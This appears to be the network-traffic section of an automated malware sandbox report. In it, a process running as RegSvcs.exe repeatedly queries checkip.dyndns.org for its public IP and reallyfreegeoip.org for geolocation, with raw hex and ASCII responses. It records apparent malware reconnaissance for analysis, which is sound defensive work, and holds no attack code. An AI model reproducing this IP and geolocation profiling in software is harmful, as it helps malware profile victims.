                                                        Apr 8, 2024 13:59:20.307406902 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:22.049896002 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449748158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:22.795017958 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:22.974997044 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:22 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449750158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:23.724900007 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:23.979584932 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449753158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:25.232907057 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:25.412451029 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                        Apr 8, 2024 13:59:25.415770054 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:25.595873117 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                        Apr 8, 2024 13:59:26.232584000 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:26.412240982 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:26 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449756158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:27.166821003 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:27.347781897 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449758158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:28.090043068 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:28.344739914 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449760158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:29.356972933 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:29.675683022 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449762158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:30.422316074 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:30.639260054 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:30 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449764158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:31.387311935 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:31.569299936 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449766158.101.44.242803844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:32.324795961 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:32.504470110 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449738172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:15 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:15 UTC710INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:15 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79456
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnComRlUv30JL1xY1TFur9JsyNdbLlIIeb6%2FbTBWNT40y5AjNzY0TZyRfbcs78Iw9%2Busq34gF7uBWKetzdDeRAM9AKrMEtq8e6GaIGR1SC%2BZR%2Fqjc%2BjOMfJO8HXwm8lZYKjNjACV"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712171849fc495c-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:15 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449739172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:16 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:16 UTC712INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:16 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79457
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skSjw8F%2FeEaajaXqSb8hFrEVPiP2sdJw%2FCY3lFfYSLmT8Iac%2Br3zhmyYvkU8USCn%2BVdvdWLutcs%2FtUW%2BO1pOwn3LXJ7FcH1KqyM0xwNEbCDbSLpB9gzodThwq7Y84ubYkpFo0JNt"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 871217203c1e5c64-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:16 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449741172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:17 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:17 UTC710INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:17 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79458
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BpNCIM%2FE3ovdeA4bSM%2FUpX1OsEN5sxMd9OjevbEpxBuluiskQyfczqf1EIJspxvVIVr6EAA942P5u9Cuupm8nEE%2Fxf8J5EVZ%2BYBen9%2FwU6bWvqNyUQC5gl01SqhfDcseb3c5AZ0n"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 871217276a552594-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:17 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449743172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:18 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:18 UTC710INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:18 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79459
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQnJtPzYoc%2BK5SN5DErvcdDcoi0ncFPi0d%2BPoA1TYNWeNnjBQsrkzHLkkbPWaMgYzEPA996zBs7X1gBRKx1c5Y6%2Bj2ToBZ6GSo5bIJwXJN2p11ozaw4yUKJ%2BHeTf%2Ftw4iN8wy4MY"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712172d5e1767db-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:18 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449745172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:19 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:20 UTC706INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:20 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79461
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EXRQ3QHwGC%2FVGJOGr0MXVQOkxOajDsljpqIHVVwjGSSICv8X%2FZxVvjbEENwm17hGQfbsUTa%2BXABLLRrG6aS7hfJFh1cWj4e1qkGz2KSpYoF7PGrA70wxsQIivRLrTVaLSMyVEA6G"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 871217364e0b747e-MIA
